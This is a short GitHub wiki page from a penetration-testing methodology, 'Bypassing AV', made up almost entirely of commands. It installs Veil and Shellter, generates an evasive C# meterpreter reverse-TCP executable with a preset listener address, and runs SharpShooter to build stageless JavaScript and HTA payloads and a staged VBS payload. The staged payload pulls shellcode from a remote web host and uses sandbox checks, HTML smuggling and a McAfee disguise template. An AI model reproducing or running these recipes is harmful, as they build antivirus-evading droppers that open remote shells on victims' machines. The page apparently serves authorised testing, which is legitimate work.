Bypassing AV - TheGetch/Penetration-Testing-Methodology GitHub Wiki
Bypassing AV
Install on Kali:
- apt install veil
- /usr/share/veil/config/setup.sh --force --silent
Reference: https://github.com/Veil-Framework/Veil
Generate exe example:
$ veil
> use 1 (Evasion)
> use 11 (cs/meterpreter/rev_tcp)
> set LPORT 4442
> set LHOST 10.52.252.94
> set USE_ARYA Y
> generate
$ ls /var/lib/veil/output/compiled/
Source: https://www.shellterproject.com/download/
- apt install shellter
Javascript Payload Stageless:
- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
Stageless HTA Payload:
- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
Staged VBS:
- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
Reference: https://github.com/mdsecactivebreach/SharpShooter